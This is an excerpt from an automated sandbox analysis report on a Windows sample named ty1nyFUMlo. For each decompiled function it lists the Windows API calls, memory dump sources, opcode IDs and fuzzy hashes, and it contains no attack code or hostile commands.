                                                                                                                        • GetCursorPos.USER32(?), ref: 005A905E
                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00567711,?,?,?), ref: 005A9094
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2864067406-0
                                                                                                                        • Opcode ID: b27de6c6acbec6156de4e9a1ab71f2b631d74f07c9319cb743fd2d600a2bce84
                                                                                                                        • Instruction ID: 78e1e6217114ea4b349123317358e3a9b9251f61f825ac4805193c2b6f17d459
                                                                                                                        • Opcode Fuzzy Hash: b27de6c6acbec6156de4e9a1ab71f2b631d74f07c9319cb743fd2d600a2bce84
                                                                                                                        • Instruction Fuzzy Hash: FB217F35600128EFDB298F94D898EEE7FB9FF8B390F144055F9058B2A1C7319990EB60
                                                                                                                        Function 0057D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?,005ACB68), ref: 0057D2FB
                                                                                                                        • GetLastError.KERNEL32 ref: 0057D30A
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0057D319
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,005ACB68), ref: 0057D376
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2267087916-0
                                                                                                                        • Opcode ID: 76388cb94e18f9081e65437e31167cb6815e4a75b097ef71fbd79a80eea411c8
                                                                                                                        • Instruction ID: dd30ee54f9184e214da932fee3480280e124b6e1bb3a7ee98d63dbb2bdbe9ca2
                                                                                                                        • Opcode Fuzzy Hash: 76388cb94e18f9081e65437e31167cb6815e4a75b097ef71fbd79a80eea411c8
                                                                                                                        • Instruction Fuzzy Hash: AF2180745042029FC700DF28D8858AA7FF4BE96324F508E1DF499C32A1DB319949DBA3
                                                                                                                        Function 00571571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00571014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0057102A
                                                                                                                          • Part of subcall function 00571014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00571036
                                                                                                                          • Part of subcall function 00571014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571045
                                                                                                                          • Part of subcall function 00571014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0057104C
                                                                                                                          • Part of subcall function 00571014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571062
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005715BE
                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 005715E1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00571617
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0057161E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1592001646-0
                                                                                                                        • Opcode ID: 3debf4159c497cb798911d18c69181ca6e1f79f5b250571d347ac980f4d9a70e
                                                                                                                        • Instruction ID: d5148ed50c7442a1c90b073f158862b54e62c827c84e81460b17fbc756df0d60
                                                                                                                        • Opcode Fuzzy Hash: 3debf4159c497cb798911d18c69181ca6e1f79f5b250571d347ac980f4d9a70e
                                                                                                                        • Instruction Fuzzy Hash: 9D219C31E00509AFDF14DFA8D948BEEBBB8FF40344F188459E445AB241E730AA04EB54
                                                                                                                        Function 005A2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 005A280A
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A2824
                                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A2832
                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005A2840
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169480361-0
                                                                                                                        • Opcode ID: 39c0dfc31608723b70144ab688f2ff65a2ee739eb85f4c753f72808fa7c1e338
                                                                                                                        • Instruction ID: 529f2b07e0fae0fc4c9482cf087dd956be51e61ec344ad3607c5499105e7dddb
                                                                                                                        • Opcode Fuzzy Hash: 39c0dfc31608723b70144ab688f2ff65a2ee739eb85f4c753f72808fa7c1e338
                                                                                                                        • Instruction Fuzzy Hash: AA21A435604512AFE7149B28C846FAA7F95FF86324F148158F4268B6D2CB75FD82CB90
                                                                                                                        Function 005778F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00578D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?), ref: 00578D8C
                                                                                                                          • Part of subcall function 00578D7D: lstrcpyW.KERNEL32(00000000,?,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00578DB2
                                                                                                                          • Part of subcall function 00578D7D: lstrcmpiW.KERNEL32(00000000,?,0057790A,?,000000FF,?,00578754,00000000,?,0000001C,?,?), ref: 00578DE3
                                                                                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577923
                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577949
                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00578754,00000000,?,0000001C,?,?,00000000), ref: 00577984
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                        • String ID: cdecl
                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                        • Opcode ID: ff143ab0125d82191432fe75cf55cef0a36e0504be0ad24b23bd59052947e8e6
                                                                                                                        • Instruction ID: c69ba510e992c9c8427f7d54099250042fd95d3cfc8c97201ea3779e63ac3bd1
                                                                                                                        • Opcode Fuzzy Hash: ff143ab0125d82191432fe75cf55cef0a36e0504be0ad24b23bd59052947e8e6
                                                                                                                        • Instruction Fuzzy Hash: E011EC3A201706AFCB155F34F849D7B7BA9FF99350B50802AF946C72A4EF319811E791
                                                                                                                        Function 00571A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00571A47
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A59
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A6F
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00571A8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 0e31a196838b77742f68b178ae0ac22c09f554d10720ad6bf42074adf9516f73
                                                                                                                        • Instruction ID: 0577911197ff0d9eda2f5f1547808625cc7fdeb60b4ac0123afe4dfc1f0706d7
                                                                                                                        • Opcode Fuzzy Hash: 0e31a196838b77742f68b178ae0ac22c09f554d10720ad6bf42074adf9516f73
                                                                                                                        • Instruction Fuzzy Hash: 5D113C3AD01219FFEB10DBA8CD85FADBB78FB04750F204091E605B7290D6716E50EB94
                                                                                                                        Function 0057E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0057E1FD
                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0057E230
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0057E246
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0057E24D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2880819207-0
                                                                                                                        • Opcode ID: 44bb02ebff3f51d0f81813ce3abf94dedf1ecfccc55a93e6e85c111484fe78b0
                                                                                                                        • Instruction ID: 7a3988581c14abb129092fbf58bd38d92f583a2ca32feb2387fa17234d5a64a6
                                                                                                                        • Opcode Fuzzy Hash: 44bb02ebff3f51d0f81813ce3abf94dedf1ecfccc55a93e6e85c111484fe78b0
                                                                                                                        • Instruction Fuzzy Hash: 2F112B76A04354BBC7059FA8EC4AA9F7FADEB5A310F008655F819D7291D670CD0897A0
                                                                                                                        Function 0053D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,?,0053CFF9,00000000,00000004,00000000), ref: 0053D218
                                                                                                                        • GetLastError.KERNEL32 ref: 0053D224
                                                                                                                        • __dosmaperr.LIBCMT ref: 0053D22B
                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 0053D249
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 173952441-0
                                                                                                                        • Opcode ID: 4a4ffae62088c53692ce58d9f1487e89508639edc2905e7017118c0ec1cd82db
                                                                                                                        • Instruction ID: d45ad4c648fb10770a3f34014536dc83df1b13599ed28869aad4c22a23baeec2
                                                                                                                        • Opcode Fuzzy Hash: 4a4ffae62088c53692ce58d9f1487e89508639edc2905e7017118c0ec1cd82db
                                                                                                                        • Instruction Fuzzy Hash: 8B01C03A805205BBCB215BA5EC09AAB7F79FF82731F100219F925921D0DF718905D7B0
                                                                                                                        Function 00533B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00533B56
                                                                                                                          • Part of subcall function 00533AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00533AD2
                                                                                                                          • Part of subcall function 00533AA3: ___AdjustPointer.LIBCMT ref: 00533AED
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00533B6B
                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00533B7C
                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00533BA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 737400349-0
                                                                                                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                        • Instruction ID: f06acc09e4593976fed23c5dc7da80649af29af9ef4ed75e1183013d4221a169
                                                                                                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                        • Instruction Fuzzy Hash: CC01E932100149BBDF125E95CC4AEEB7F69FF98754F044014FE4866121C736E961DBA0
                                                                                                                        Function 00543073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005113C6,00000000,00000000,?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue), ref: 005430A5
                                                                                                                        • GetLastError.KERNEL32(?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue,005B2290,FlsSetValue,00000000,00000364,?,00542E46), ref: 005430B1
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue,005B2290,FlsSetValue,00000000), ref: 005430BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: 44481e7845afbf6406d13e7582b9270bbef0e4905ff1adf5a953710904a22a5a
                                                                                                                        • Instruction ID: f2fed4ac56fc8efa5cff5c1b14f288658ecd53835b938a4d63b369a4f0a037f9
                                                                                                                        • Opcode Fuzzy Hash: 44481e7845afbf6406d13e7582b9270bbef0e4905ff1adf5a953710904a22a5a
                                                                                                                        • Instruction Fuzzy Hash: B4012B36301622ABCB314B789C4CA977FD8BF16B65B200720F90DE7160D721DD09C6E0
                                                                                                                        Function 00577464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0057747F
                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00577497
                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005774AC
                                                                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005774CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1352324309-0
                                                                                                                        • Opcode ID: 2196ade24e098f3051b76bb2e59be5ba11d3f95ddb171f1d1f0995e41220346c
                                                                                                                        • Instruction ID: b428db24a8e2cfd7b177b09b814ab7e5dd40fe082681dfb19efc57fad476ba2b
                                                                                                                        • Opcode Fuzzy Hash: 2196ade24e098f3051b76bb2e59be5ba11d3f95ddb171f1d1f0995e41220346c
                                                                                                                        • Instruction Fuzzy Hash: 2D115EB52053199BEB208F24FC09F927FFDFB08B04F10C969A66AD6151D7B0E908EB50
                                                                                                                        Function 0057B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0C4
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0E9
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0F3
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B126
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2875609808-0
                                                                                                                        • Opcode ID: b169ba9a6fa6bb47b6f596badd9c1977d522f5af8ac7ca63f8567c3d9dd268cc
                                                                                                                        • Instruction ID: 526469fef58ce4f13997d9a2c1d5ba6b1fd7f46e53ea40b979a20e7d06872028
                                                                                                                        • Opcode Fuzzy Hash: b169ba9a6fa6bb47b6f596badd9c1977d522f5af8ac7ca63f8567c3d9dd268cc
                                                                                                                        • Instruction Fuzzy Hash: 75117930E01529E7DF00AFE4E9A8BEEBF78FF5A311F008486D945B2181CB305655EB51
                                                                                                                        Function 00572DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00572DC5
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00572DD6
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00572DDD
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00572DE4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2710830443-0
                                                                                                                        • Opcode ID: 344b7d775e18aee94c14438d19be04ade4602f15936627034996f612069c5f11
                                                                                                                        • Instruction ID: 95905d093804b29c87b2925ec2f55ab28fb7749f35a8b20dd49f0099a903da29
                                                                                                                        • Opcode Fuzzy Hash: 344b7d775e18aee94c14438d19be04ade4602f15936627034996f612069c5f11
                                                                                                                        • Instruction Fuzzy Hash: 38E092B16012347BD7305B76AC0DFEB3E6CFF63BA1F004015F109D20809AA0C845E6B0
                                                                                                                        Function 005A8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
                                                                                                                          • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296A2
                                                                                                                          • Part of subcall function 00529639: BeginPath.GDI32(?), ref: 005296B9
                                                                                                                          • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296E2
                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 005A8887
                                                                                                                        • LineTo.GDI32(?,?,?), ref: 005A8894
                                                                                                                        • EndPath.GDI32(?), ref: 005A88A4
                                                                                                                        • StrokePath.GDI32(?), ref: 005A88B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
